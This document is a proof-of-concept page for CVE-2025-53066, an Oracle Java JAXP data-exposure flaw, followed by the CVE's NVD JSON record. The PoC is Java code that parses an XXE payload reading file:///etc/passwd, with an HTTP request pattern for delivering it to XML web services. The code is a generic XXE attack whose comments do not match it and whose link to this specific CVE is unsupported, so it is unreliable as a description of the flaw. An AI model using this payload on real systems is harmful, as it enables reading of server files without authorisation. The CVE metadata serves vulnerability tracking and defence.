CVE-2025-53066

# CVE-2025-53066 - Oracle Java SE JAXP Component Unauthorized Data Access # This PoC demonstrates the vulnerability pattern in JAXP XML processing # The vulnerability allows unauthenticated remote attackers to access critical data import javax.xml.parsers.DocumentBuilder; import javax.xml.parsers.DocumentBuilderFactory; import org.xml.sax.InputSource; import java.io.StringReader; public class CVE_2025_53066_PoC { public static void main(String[] args) { try { // Crafted malicious XML payload exploiting JAXP vulnerability // The vulnerability exists in XML processing within JAXP component String maliciousXml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" + "<!DOCTYPE foo [\n" + " <!ENTITY xxe SYSTEM \"file:///etc/passwd\">\n" + "]>\n" + "<root>\n" + " <data>&xxe;</data>\n" + "</root>"; // Disable external entity processing security restrictions DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); // Attempt to exploit the JAXP vulnerability // Note: Actual exploitation may require specific configurations // to bypass security restrictions in affected versions DocumentBuilder builder = factory.newDocumentBuilder(); InputSource is = new InputSource(new StringReader(maliciousXml)); // Process the malicious XML - in vulnerable versions, // this may result in unauthorized data access builder.parse(is); System.out.println("PoC executed - check for unauthorized data access"); } catch (Exception e) { System.err.println("Error during PoC execution: " + e.getMessage()); } } } # Network-based exploitation example: # Attackers can send crafted XML data via web services that use JAXP APIs # Example HTTP request pattern: # # POST /xml-service-endpoint HTTP/1.1 # Host: target-host # Content-Type: application/xml # # [Malicious XML payload exploiting JAXP vulnerability] # # This vulnerability can also be triggered through: # - Java Web Start applications loading malicious XML # - Java Applets processing untrusted XML data # - Server-side XML processing via JAXP APIs

{"cve": {"id": "CVE-2025-53066", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:47.177", "lastModified": "2026-05-12T13:17:21.753", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 8u461, 8u461-perf, 11.0.28, 17.0.16, 21.0.8, 25; Oracle GraalVM for JDK: 17.0.16 and 21.0.8; Oracle GraalVM Enterprise Edition: 21.3.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:graalvm:21.3.15:*:*:*:enterprise:*:*:*", "matchCriteriaId": "37490B26-61B5-49DF-8A7C-47518473BBC1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:graalvm_for_jdk:17.0.16:*:*:*:*:*:*:*", "matchCriteriaId": "56BDCE92-E161-46DC-8A2E-17EF7303DBFB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:graalvm_for_jdk:21.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "29154F4D-88E2-43FA-9DDA-1DEF5F588A31"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:jdk:1.8.0:update461:*:*:-:*:*:*", "matchCriteriaId": "4FEDA610-719F-491A-8AA8-4792956DFFA2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:jdk:1.8.0:update461:*:*:enterprise_performance_pack:*:*:*", "matchCriteriaId": "6D5E2690-0B45-464D-9689-D370049BAFBF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:jdk:11.0.28:*:*:*:*:*:*:*", "matchCriteriaId": "D6E11C3A-7940-4561-B420-5EE75A6A86E8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:jdk:17.0.16:*:*:*:*:*:*:*", "matchCriteriaId": "B8119FE1-F23D-40BE-AAC0-E1CEEA23EA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:jdk:21.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "280B946E-65E7-40E7-93AE-C9FF37FF0CC4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:jdk:25:*:*:*:*:*:*:*", "matchCriteriaId": "9007EF86-9404-4D14-BE09-5859DD63D41F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:jre:1.8.0:update461:*:*:-:*:*:*", "matchCriteriaId": "9ADF4DB6-6B75-4189-8EC4-EB1FA7717E08"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:jre:1.8.0:update461:*:*:enterprise_performance_pack:*:*:*", "matchCriteriaId": "766ABBC7-BDC6-4ADC-A469-E0CC5F7648D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:jre:11.0.28:*:*:*:*:*:*:*", "matchCriteriaId": "DE86F002-47D1-4D99-A409-F71ABDBC8D40"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:jre:17.0.16:*:*:*:*:*:*:*", "matchCriteriaId": "B07375CB-20C1-45F8-9691-48694FDD04FC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:jre:21.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "A708A66E-E203-4222-93F6-645436098581"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:jre:25:*:*:*:*:*:*:*", "matchCriteriaId": "2AD56177-F003-4CB2-8E77-4942AC6F4911"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00026.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html", "source": "0b142b55-0307-4c5a-b3c9-f314f3fb7c5e"}]}}